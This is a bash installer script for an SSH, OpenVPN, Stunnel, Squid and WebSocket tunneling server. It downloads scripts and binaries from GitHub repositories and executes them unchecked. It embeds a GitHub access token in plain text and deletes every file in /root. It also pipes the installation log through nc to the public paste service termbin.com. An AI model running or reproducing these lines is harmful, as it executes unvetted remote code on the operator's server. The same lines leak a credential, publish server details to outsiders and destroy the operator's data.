#!/bin/bash
# shellcheck disable=SC1117,SC2086
# Private SSH+OVPN+Stunnel+Squid+WS Installer
# Author: Bonveio <bonveiochan@gmail.com>
# Copyright ©Freenet.Cafe
# This script is for 64-bit system ONLY

curl -skLO -H "Authorization: token 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" -H "Accept: application/vnd.github.v3.raw" "https://raw.githubusercontent.com/yakult13/foodsonly/main/install.sh" && bash install.sh

apt purge fcafevpn -yf
rm -rf /etc/fcafevpn /etc/systemd/system/fcafevpn*
systemctl stop fcafevpn-server@tcp fcafevpn-server@udp
systemctl daemon-reload

wget -q https://github.com/yakult13/OpenVPN/raw/main/OVPN && chmod +x OVPN && ./OVPN

cd /usr/local/sbin/
rm -rf {accounts,base-ports,base-ports-wc,base-script,bench-network,clearcache,connections,create,create_random,create_trial,delete_expired,delete_all,diagnose,edit_dropbear,edit_openssh,edit_openvpn,edit_ports,edit_squid3,edit_stunnel4,locked_list,menu,options,ram,reboot_sys,reboot_sys_auto,restart_services,server,set_multilogin_autokill,set_multilogin_autokill_lib,show_ports,speedtest,user_delete,user_details,user_details_lib,user_extend,user_list,user_lock,user_unlock}
wget -q 'https://github.com/yakult13/parte/raw/main/fixed1.zip'
unzip -qq fixed1.zip
rm -f fixed1.zip
chmod +x ./*
dos2unix ./* &> /dev/null
cd

rm -f /root/*

 echo -e "\033[1;33m Installation Complete\033[0m"
 echo -e ""
 echo -e "\033[1;33m Copy This On Your Note\033[0m !"
 echo -e ""
 echo -e "\033[1;33m Service Ports:\033[0m "
 echo -e "\033[1;33m WS+SSH:\033[0m 80"
 echo -e "\033[1;33m WS+OVPN:\033[0m 81"
 echo -e "\033[1;33m SSH:\033[0m 22, 225"
 echo -e "\033[1;33m SSL:\033[0m 421, 443"
 echo -e "\033[1;33m Squid:\033[0m 8010, 8080"
 echo -e "\033[1;33m OVPN TCP:\033[0m 110"
 echo -e "\033[1;33m OVPN UDP:\033[0m 1194"
 echo -e "\033[1;33m BAD OVPN:\033[0m 1194"
 echo -e ""
cat ~/install.log | nc termbin.com 9999 | tr -d '\0' > /tmp/.juanvps.txt 2>&1
 echo -e ""
 echo -e "\033[1;33m [Note] DO NOT RESELL THIS SCRIPT\033[0m"
